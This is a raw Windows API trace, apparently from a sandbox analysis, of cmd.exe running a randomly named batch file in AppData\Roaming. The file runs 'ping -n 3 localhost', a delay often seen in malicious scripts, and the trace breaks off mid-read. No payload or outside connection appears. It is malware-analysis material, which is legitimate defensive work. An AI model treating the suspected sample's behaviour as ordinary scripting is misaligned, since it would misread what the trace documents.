GetConsoleOutputCP () returned 0x1b5 [0109.122] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.122] GetUserDefaultLCID () returned 0x409 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fa68, cchData=128 | out: lpLCData="0") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fa68, cchData=128 | out: lpLCData="0") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fa68, cchData=128 | out: lpLCData="1") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 
[0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0109.123] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.124] GetConsoleTitleW (in: lpConsoleTitle=0x4201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.124] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0109.129] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", _String2=")") returned 58 [0109.129] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 3 [0109.129] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 3 [0109.129] _wcsicmp (_String1="IF", 
_String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 6 [0109.129] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 6 [0109.129] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 15 [0109.129] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 15 [0109.130] GetConsoleTitleW (in: lpConsoleTitle=0x22f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f51c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f514, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f514*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.180] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0109.180] SetErrorMode (uMode=0x0) returned 0x0 [0109.180] SetErrorMode (uMode=0x1) returned 0x0 [0109.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x42dc08, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f280*="vMfCCeRYkvQy") returned 0x2d [0109.180] SetErrorMode (uMode=0x0) returned 0x1 [0109.180] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0109.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.185] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0109.185] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", fInfoLevelId=0x1, lpFindFileData=0x22f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f01c) returned 0x4208f0 [0109.185] FindClose (in: hFindFile=0x4208f0 | out: hFindFile=0x4208f0) returned 1 [0109.185] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0109.185] GetConsoleTitleW (in: lpConsoleTitle=0x22f4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.185] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0109.188] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0109.188] IdentifyCodeAuthzLevelW () returned 0x1 [0109.195] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0109.195] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0109.195] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0109.195] CloseCodeAuthzLevel () returned 0x1 [0109.195] SetErrorMode (uMode=0x0) returned 0x0 [0109.195] SetErrorMode (uMode=0x1) returned 0x0 [0109.195] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", nBufferLength=0x104, lpBuffer=0x4204e8, lpFilePart=0x22f3e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", lpFilePart=0x22f3e0*="8Nkh0cv7.cmd") returned 0x3a [0109.195] SetErrorMode (uMode=0x0) returned 0x1 [0109.195] CmdBatNotification () returned 0x0 [0109.196] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x58 [0109.196] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0109.196] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.196] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.196] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.196] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.196] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x91, lpOverlapped=0x0) returned 1 [0109.197] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0109.197] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.197] GetFileType (hFile=0x58) returned 0x1 [0109.198] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.198] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.198] _wcsicmp (_String1="ping", _String2=")") returned 71 [0109.198] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0109.198] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0109.198] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0109.198] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0109.198] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0109.198] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0109.199] _tell (_FileHandle=3) returned 21 [0109.199] _close (_FileHandle=3) returned 0 [0109.199] _vsnwprintf (in: _Buffer=0x4a9f4640, 
_BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0109.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.199] GetFileType (hFile=0x7) returned 0x2 [0109.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.199] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0109.200] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.200] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.200] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0109.200] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] GetFileType (hFile=0x7) returned 0x2 [0109.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.200] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] GetFileType (hFile=0x7) returned 0x2 [0109.201] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) 
returned 1 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x420958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x420958*, lpNumberOfCharsWritten=0x22f450*=0x4) returned 1 [0109.201] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" -n 3 localhost ") returned 16 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] GetFileType (hFile=0x7) returned 0x2 [0109.201] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x10) returned 1 [0109.202] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0109.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.202] GetFileType (hFile=0x7) returned 0x2 [0109.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.202] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0109.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.202] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0109.202] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0109.202] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0109.202] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0109.202] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0109.202] _wcsicmp (_String1="ping", _String2="COPY") returned 
13 [0109.202] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0109.202] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0109.202] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0109.202] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0109.202] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0109.203] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0109.203] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0109.203] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0109.203] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0109.203] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0109.203] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0109.203] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0109.203] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0109.203] _wcsicmp (_String1="ping", _String2="START") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0109.203] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0109.203] _wcsicmp (_String1="ping", 
_String2="MOVE") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0109.203] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0109.203] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0109.203] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0109.203] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0109.204] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.204] SetErrorMode (uMode=0x0) returned 0x0 [0109.204] SetErrorMode (uMode=0x1) returned 0x0 [0109.204] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x430550, lpFilePart=0x22f220 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f220*="Desktop") returned 0x18 [0109.204] SetErrorMode (uMode=0x0) returned 0x1 [0109.204] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.204] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.204] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.204] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] GetLastError () returned 0x2 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] 
GetLastError () returned 0x2 [0109.205] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0x430838 [0109.205] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] GetLastError () returned 0x2 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0x430838 [0109.205] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0109.206] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.206] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.206] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.206] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.206] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.206] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x22e888) returned 0xffffffff [0109.206] GetLastError () returned 0x2 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0xffffffff [0109.206] GetLastError () returned 0x2 [0109.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0x430d80 [0109.207] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0109.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0xffffffff [0109.207] GetLastError () returned 0x2 [0109.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0x430d80 [0109.207] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0109.207] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.207] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.207] GetConsoleTitleW (in: lpConsoleTitle=0x22ed80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.207] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ecd0 | out: lpAttributeList=0x22ec08, lpSize=0x22ecd0) returned 1 [0109.207] UpdateProcThreadAttribute (in: lpAttributeList=0x22ec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ec08, lpPreviousValue=0x0) 
returned 1 [0109.207] GetStartupInfoW (in: lpStartupInfo=0x22ebc4 | out: lpStartupInfo=0x22ebc4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0109.207] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0109.208] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22ec64*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ecb0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22ecb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xcfc, dwThreadId=0xd00)) returned 1 [0109.211] CloseHandle (hObject=0x58) returned 1 [0109.211] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.211] GetEnvironmentStringsW () returned 0x420970* [0109.211] FreeEnvironmentStringsW (penv=0x420970) returned 1 [0109.211] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0111.974] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eba4 | out: lpExitCode=0x22eba4*=0x0) returned 1 [0111.974] CloseHandle (hObject=0x54) returned 1 [0111.974] _vsnwprintf (in: _Buffer=0x22ecec, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ebb0 | out: _Buffer="00000000") returned 8 [0111.974] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") 
returned 1 [0111.974] GetEnvironmentStringsW () returned 0x422c28* [0111.974] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0111.974] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0111.974] GetEnvironmentStringsW () returned 0x422c28* [0111.975] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0111.975] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ec08 | out: lpAttributeList=0x22ec08) [0111.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.975] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.975] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.975] SetConsoleInputExeNameW () returned 0x1 [0111.975] GetConsoleOutputCP () returned 0x1b5 [0111.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.975] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.975] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.975] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.975] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0111.976] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.976] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0111.976] ReadFile (in: 
